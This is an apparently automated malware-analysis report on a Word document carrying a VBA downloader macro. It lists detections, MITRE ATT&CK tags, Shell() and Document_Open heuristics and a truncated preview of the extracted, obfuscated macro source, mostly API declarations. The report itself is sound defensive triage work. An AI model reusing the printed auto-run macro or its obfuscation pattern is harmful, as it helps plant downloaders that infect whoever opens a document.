Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
This OOXML document contains a VBA project with a Document_Open macro that executes obfuscated code. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature as a downloader. The VBA code itself is heavily obfuscated and truncated, preventing a more detailed analysis of its specific actions.
Heuristics (6)
- ClamAV: Doc.Downloader.Generic-8011192-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project — VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OOXML body / shared strings):
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2006/wordml
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 48020 bytes | 43c9ad5f3ce814626c1fb963420b9fe097f0184b606bd1b7e2d2ac434810cda6 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
hsdfjh34j5k.ncjjkj34SD4
End Sub
Attribute VB_Name = "hsdfjh34j5k"
Private Type DSFG36SDFGsfj2bhnkijb345
dsgf4 As Long
dg43t4 As String
hj56y As Long
' nbk54 As Long
' ngi24 As Long
dwXCars As Long
cerved2 As Integer
htput As Long
hror As Long
End Type
Private Type DFG546CV345rpaoisdfgi34
hess As Long
' ead As Long
ocessD As Long
hPrss As Long
hhad As Long
deadI As Long
End Type
#If VBA7 Then
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal fkjn54lk4nlws As LongPtr, ByVal cbkjwhefkjhv4j3rhvw As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hsdfkjo3lw4h5o3ghkijfs As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
'Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hInstance As LongPtr, ByVal lParam As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreatePopupMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreateWindow Lib "user32" Alias "CreateWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, lpParam As Any) As LongPtr
'Declare PtrSafe Function DdeAddData Lib "user32" Alias "DdeAddDataA" (ByVal hData As LongPtr, pSrc As Byte, ByVal cb As LongPtr, ByVal cbOff As LongPtr) As LongPtr
'Declare PtrSafe Function DdeClientTransaction Lib "user32" (pData As Byte, ByVal cbData As LongPtr, ByVal hConv As LongPtr, ByVal hszItem As LongPtr, ByVal wFmt As LongPtr, ByVal wType As LongPtr, ByVal dwTimeout As LongPtr, pdwResult As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnect Lib "user32" (ByVal hConv As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnectList Lib "user32" (ByVal hConvList As LongPtr) As LongPtr
'Declare PtrSafe Function DdeEnableCallback Lib "user32" (ByVal idInst As LongPtr, ByVal hConv As LongPtr, ByVal wCmd As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
'Declare PtrSafe Function DdeGetDat
... (truncated)

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 153088 bytes | 0c5d6c5d860d97cb70b151f3382d396798b88b167abd51be43954a15f7785777 |

Detection for vbaProject_00.bin:
- ClamAV: Doc.Downloader.Generic-8011192-0
- Obfuscation or payload: unlikely